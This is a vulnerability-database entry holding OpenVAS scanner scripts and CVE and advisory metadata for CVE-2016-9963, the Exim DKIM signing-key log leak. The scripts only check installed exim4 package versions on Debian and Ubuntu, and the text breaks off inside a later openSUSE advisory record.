ID OPENVAS:1361412562310703747 Type openvas Reporter Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net Modified 2019-03-18T00:00:00
Description
Bjoern Jacke discovered that Exim,
Debian
# OpenVAS Vulnerability Test
# $Id: deb_3747.nasl 14279 2019-03-18 14:48:34Z cfischer $
# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.703747");
script_version("$Revision: 14279 $");
script_cve_id("CVE-2016-9963");
script_name("Debian Security Advisory DSA 3747-1 (exim4 - security update)");
script_tag(name:"last_modification", value:"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $");
script_tag(name:"creation_date", value:"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)");
script_tag(name:"cvss_base", value:"2.6");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:P/I:N/A:N");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"package");
script_xref(name:"URL", value:"http://www.debian.org/security/2016/dsa-3747.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net");
script_family("Debian Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB8");
script_tag(name:"affected", value:"exim4 on Debian Linux");
script_tag(name:"solution", value:"For the stable distribution (jessie),
this problem has been fixed in version 4.84.2-2+deb8u2.
We recommend that you upgrade your exim4 packages.");
script_tag(name:"summary", value:"Bjoern Jacke discovered that Exim,
Debian's default mail transfer agent, may leak the private DKIM signing key to
the log files if specific configuration options are met.");
script_tag(name:"vuldetect", value:"This check tests the installed software
version using the apt package manager.");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
res = "";
report = "";
if((res = isdpkgvuln(pkg:"exim4", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-base", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-config", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-daemon-heavy", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-daemon-heavy-dbg", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-daemon-light", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-daemon-light-dbg", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-dbg", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"exim4-dev", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"eximon4", ver:"4.84.2-2+deb8u2", rls:"DEB8")) != NULL) {
report += res;
}
if(report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99);
}
{"id": "OPENVAS:1361412562310703747", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", "description": "Bjoern Jacke discovered that Exim,\nDebian", "published": "2016-12-25T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703747", "reporter": "Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2016/dsa-3747.html"], "cvelist": ["CVE-2016-9963"], "lastseen": "2019-05-29T18:35:51", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9963"]}, {"type": "ubuntu", "idList": ["USN-3164-1"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "ALA_ALAS-2017-804.NASL", "UBUNTU_USN-3164-1.NASL", "DEBIAN_DSA-3747.NASL", "DEBIAN_DLA-762.NASL", "OPENSUSE-2017-980.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106485", "OPENVAS:703747", "OPENVAS:1361412562310843007", "OPENVAS:1361412562310851601"]}, {"type": "amazon", "idList": ["ALAS-2017-804"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3747-1:65DFE", "DEBIAN:DLA-762-1:0D8D2"]}, {"type": "freebsd", "idList": ["E7002B26-CAAA-11E6-A76A-9F7324E5534E"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2289-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920"]}], "modified": "2019-05-29T18:35:51", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2019-05-29T18:35:51", "rev": 2}, "vulnersScore": 6.3}, "pluginID": "1361412562310703747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703747\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T20:07:44", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "title": "CVE-2016-9963", "type": "cve", "cwe": ["CWE-320"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-15T12:47:00", "cpe": ["cpe:/a:exim:exim:4.87", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-9963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.87:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.10:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-02T11:38:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain \nconfigurations, private DKIM signing keys could be leaked to the log files.", "edition": 5, "modified": "2017-01-05T00:00:00", "published": "2017-01-05T00:00:00", "id": "USN-3164-1", "href": "https://ubuntu.com/security/notices/USN-3164-1", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2017-07-24T12:55:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "description": "Bjoern Jacke discovered that Exim,\nDebian", "modified": "2017-07-07T00:00:00", "published": "2016-12-25T00:00:00", "id": "OPENVAS:703747", "href": "http://plugins.openvas.org/nasl.php?oid=703747", "type": "openvas", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703747);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent.\nexim4 is the metapackage depending on the essential components for a basic exim4\ninstallation.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-01-06T00:00:00", "id": "OPENVAS:1361412562310843007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843007", "type": "openvas", "title": "Ubuntu Update for exim4 USN-3164-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-3164-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843007\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 05:45:22 +0100 (Fri, 06 Jan 2017)\");\n script_cve_id(\"CVE-2016-9963\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3164-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain\nconfigurations, private DKIM signing keys could be leaked to the log files.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3164-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/USN-3164-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "description": "Exim is prone to an information disclosure vulnerability.", "modified": "2018-11-13T00:00:00", "published": "2016-12-23T00:00:00", "id": "OPENVAS:1361412562310106485", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106485", "type": "openvas", "title": "Exim Information Disclosure Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_cve_2016_9963.nasl 12338 2018-11-13 14:51:17Z asteins $\n#\n# Exim Information Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106485\");\n script_version(\"$Revision: 12338 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-13 15:51:17 +0100 (Tue, 13 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 10:52:32 +0700 (Fri, 23 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim Information Disclosure Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SMTP problems\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"If several conditions are met, Exim leaks private information to a remote\nattacker.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may obtain private information.\");\n\n script_tag(name:\"affected\", value:\"Exim 4.69 until 4.87.\");\n\n script_tag(name:\"solution\", value:\"Update to Exim 4.87.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=1996\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.69\", test_version2: \"4.87\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.87.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:28:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-08-30T00:00:00", "id": "OPENVAS:1361412562310851601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851601", "type": "openvas", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851601\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-08-30 07:23:21 +0200 (Wed, 30 Aug 2017)\");\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n Changes in exim:\n\n - specify users with ref:mail, to make them dynamic. (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to 'stack\n crash' local privilege escalation (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users handling in TW.\n\n - 